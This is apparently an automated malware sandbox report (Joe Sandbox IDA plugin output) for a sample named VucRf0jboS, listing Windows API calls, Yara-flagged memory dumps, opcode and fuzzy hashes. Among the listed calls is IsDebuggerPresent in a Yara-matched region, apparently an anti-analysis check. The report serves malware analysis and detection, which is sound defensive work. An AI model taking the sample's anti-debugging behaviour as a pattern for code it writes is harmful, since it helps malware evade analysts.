                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                                      • Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04150A9A
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04150AA4
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 04150AB1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                                      • Instruction ID: cdd487c89eaf038454d57bf24501fde9c040af8dca135c0fc89d7bff390e9762
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6831B2B494122CDBCF21DF64D988799BBB4BF48310F5041EAE81CA7260E730AB858F55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,04153C24,00000003,00438DB0,0000000C,04153D7B,00000003,00000002,00000000,?,04152DD2,00000003), ref: 04153C6F
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,04153C24,00000003,00438DB0,0000000C,04153D7B,00000003,00000002,00000000,?,04152DD2,00000003), ref: 04153C76
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 04153C88
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                                      • Instruction ID: 4f5e94172af6ad61c2466a62b1e62f7fa5ca43a9b8ae2a3a3bae855fee8148a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE0463110010DEBCF226F64CE4CA993F39EB44285F408029FD2A8B231CB35EE62CA84
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                      • Instruction ID: e3c758e8dcecefb8623dba5f8633c0ab786f3d83586aa24f252eef9d42c9f75e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 873128B6910609DFEB10CF99C880BAEBBF5FF48324F15408AD545A7350D771EA45CBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                      • Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                                                                                                      • Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                                                                                                      • Instruction ID: 7910d2421fc546f411c06c7753803acbe34ab87186523b29efbc1145b0a95cdd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23020972E00219DBDF24CFA9D8806EDB7F1EF88314F1582A9D829EB354D731A9418F90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$@
                                                                                                                                                                                                                                      • API String ID: 0-149943524
                                                                                                                                                                                                                                      • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                                      • Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$@
                                                                                                                                                                                                                                      • API String ID: 0-149943524
                                                                                                                                                                                                                                      • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                                      • Instruction ID: 42690012d3296e6fcf3d309373c87aa6a54220f18d21174456ec1e65cdc29314
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4315A762461824BC315CB2DD8F81B6B781FBC6260B2E83E9D0858F24AF366A446C749
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                      • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                                      • Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0415B984,00000000,?,00000008,?,?,04163766,00000000), ref: 0415BBB6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                      • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                                      • Instruction ID: 3caf1124b6e56d8476ffb039f730e3c67bd73d18cbd4cd93e2438bf875e24f3e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94B12931614608DFD719CF28C4C6BA57BA0FF45364F258698E8AACF2A1C775FA81CB44
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1663032902-0
                                                                                                                                                                                                                                      • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                                      • Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FDF
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FEC
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04160829
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1663032902-0
                                                                                                                                                                                                                                      • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                                      • Instruction ID: 3f899f575283045598b9822b51e4c7cfb780d425c540320f6dbc7b00f372bd6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A21B6729502069BEB28EE28DC81BBA77ACEB48314F1001BAED1AD6150E775F954CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                                                                                      • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                                      • Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 041604CF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                                                                                      • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                                      • Instruction ID: 542828be4532425bd687f4cd7750d37fc26aa71d22fe881155db60feda36a759
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 021129366003019FDB28DF39D8E46BABB91FF84318B54442DE98787A40D371B552C740
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2692324296-0
                                                                                                                                                                                                                                      • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                                      • Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,041607A3,00000000,00000000,?), ref: 04160A31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2692324296-0
                                                                                                                                                                                                                                      • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                                      • Instruction ID: a1726656d864b7605c994003f84a7a9b38ae647571e9a9544c8c9f1b3d70537f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F0FE326101256FDB28DA148C457BA7FA8DB44754F050469ED0FA3140EB75FE51C5D0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FDF
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FEC
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04160829
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1663032902-0
                                                                                                                                                                                                                                      • Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                                                                                                      • Instruction ID: fd364cc7628cb7cc9bac6280e9e63dd92415cef2e7830e1b499222cb9052e2d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BF0D132A51209ABEB18EF64DC91ABA33ACDB88314F0001BAE90AD7240DB74BD0587D4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                                                                                      • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                                      • Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
